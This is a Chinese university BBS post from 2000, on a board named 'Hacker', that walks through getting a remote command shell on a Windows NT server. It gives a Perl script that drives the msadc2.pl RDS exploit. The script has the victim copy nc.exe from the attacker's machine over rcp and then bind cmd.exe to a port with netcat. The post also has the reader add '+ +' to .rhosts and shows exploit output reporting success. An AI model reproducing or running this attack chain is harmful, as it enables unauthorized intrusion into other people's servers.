荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: williamlong (蓝色月光), 信区: Hacker
标  题: 从远程NT服务器上得到Shell
发信站: BBS 荔园晨风站 (Mon Apr  3 14:27:10 2000), 转信

    首先准备好一台Linux机器(Hacker必不可少的系统,我特别喜欢RedHat
 Linux),下面测试就以我的RedHat为基础。首先到自己的主目录中。用vi编写下面的
一段perl程序。例如:vi spawncmd.pl

#!/usr/bin/perl
if (!($ARGV[0]))

print "spawncmd.pl [remote host] [my _REAL_ ip] [desired port]\n";
exit;
}
if (!($ARGV[1]))

print "spawncmd.pl $ARGV[0] [my _REAL_ ip] [desired port]\n";
exit;
}
if (!($ARGV[2]))

print "spawncmd.pl $ARGV[0] $ARGV[1] [desired port]\n";
exit;
}
open(RHOST, "| ./msadc2.pl -h $ARGV[0]");
print RHOST "rcp -b $ARGV[1].$ENV{'USER'}:$ENV{'HOME'}/nc.exe .\n";
close RHOST;
# 根据你的机器和被攻击机器的带宽情况,可以适当调整下面的时间。
sleep 5;
open(RHOST, "| ./msadc2.pl -h $ARGV[0]");
print RHOST "nc -l -p $ARGV[2] -e cmd.exe\n";
close RHOST;
# 连接完成之后,移除 "+ +" 从你系统的.rhosts文件中移除 "+ +" 标记。
system("telnet $ARGV[0] $ARGV[2]");
编写完毕以后,用vi的wq命令存盘退出到Shell下。接着上载nc.exe文件和著名的
msadc2.pl文件到相同目录中。然后chmod 755 *.pl为执行属性。

接下来就是让远程机器在指定端口产生一个命令解释shell。但是必须首先在你自己系
统的.rhosts文件中添加"+ +"标记。(显然这也是非常危险的安全隐患,但是为了进一
步的安全测试,这是必须的).rhost是一个设定可信任远程login的配置文件。可以在
第一栏用 + 来取代任何信任主机 ,第二栏用 + 来取代任何远程信任用户。

好了,下面就是攻击测试了,用法如下:

[hacker@www hacker]$ ./spawncmd.pl 被攻击的NT主机IP  本机IP 任意端口(如
1234)
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: d: Success!
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: d: Success!
Trying xxx.xxx.xxx.xxx...

等待一会,连接成功以后,就在指定的端口得到一个Shell了。接下来就是其它你该作
的的事情了。记住,最后退出到本地Shell时,别忘了将.rhost文件删除。否则就成了
方便他人入侵的后门了。

具体漏洞分析和解决方法,请参看“系统漏洞”栏目相关信息




--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: AnonymousOrganizatio]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店